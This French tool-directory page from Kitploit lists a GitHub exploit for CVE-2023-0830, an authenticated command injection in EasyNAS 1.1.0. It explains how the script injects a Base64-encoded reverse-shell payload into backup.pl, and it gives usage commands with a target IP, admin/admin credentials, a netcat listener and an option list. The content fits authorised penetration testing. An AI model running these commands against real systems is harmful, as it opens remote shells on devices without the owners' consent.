Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-0830 — Exploit pour EasyNAS version 1.1.0. La vulnérabilité exploitée est une faille d'injection de commandes, qui nécessite une authentification. | Kitploit
Outils/GitHubGitHub/xbz0n/cve-2023-0830
Génération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubxbz0n/cve-2023-0830

CVE-2023-0830

Exploit pour EasyNAS version 1.1.0. La vulnérabilité exploitée est une faille d'injection de commandes, qui nécessite une authentification.

Voir le dépôt
112il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-0830: Exploitation d'injection de commandes OS authentifiée dans EasyNAS 1.1.0

Ce script Python est un exploit puissant pour EasyNAS version 1.1.0 avec des fonctionnalités améliorées, incluant un écouteur intégré. La vulnérabilité exploitée est une faille d'injection de commandes, qui nécessite une authentification.

Le script établit une session avec le serveur cible, puis envoie une demande de connexion avec les identifiants fournis par l'utilisateur. Après une authentification réussie, le script construit une charge utile qui, lorsqu'elle est exécutée, ouvre une connexion reverse shell vers une IP et un port spécifiés par l'utilisateur. Cette charge utile est encodée en URL et en Base64, puis injectée dans le fichier backup.pl sur le serveur via une requête GET conçue.

CVE: CVE-2023-0830

Auteur de l'exploit

Ivan Spiridonov (xbz0n) https://xbz0n.sh

Page d'accueil du fournisseur

https://www.easynas.org

Fonctionnalités

  • Écouteur reverse shell intégré - pas besoin de processus netcat séparé
  • Détection automatique de l'adresse IP pour l'écouteur
  • Option pour utiliser différents types de shell (bash, sh, python)
  • Prise en charge de HTTP et HTTPS
  • Prise en charge des écouteurs externes

Utilisation

Utilisation de base avec écouteur intégré (recommandé) :

root@kitploit:~
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin

Utilisation d'un écouteur externe (démarrez nc -lvnp 4444 d'abord) :

root@kitploit:~
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444

Options :

root@kitploit:~
--mode {shell,reverse}    Mode d'exploitation : shell (reverse shell intégré) ou reverse (écouteur externe)
--lhost IP_ADDRESS        Adresse IP pour l'écouteur reverse shell (détectée automatiquement par défaut)
--lport PORT              Port pour l'écouteur reverse shell (par défaut : 4444)
--protocol {http,https}   Protocole à utiliser (par défaut : https)
--verbose                 Activer la sortie verbose
--shell {bash,sh,python}  Spécifier le type de shell à utiliser avec l'écouteur intégré (par défaut : bash)

Dépendances

  • Python 3
  • Bibliothèque Requests

Avertissement

Ce script est destiné uniquement à des fins éducatives et à des tests d'intrusion autorisés. Demandez toujours une autorisation explicite avant d'effectuer des tests d'intrusion contre un réseau ou un système.

Veuillez l'utiliser de manière responsable.

Télécharger l’outil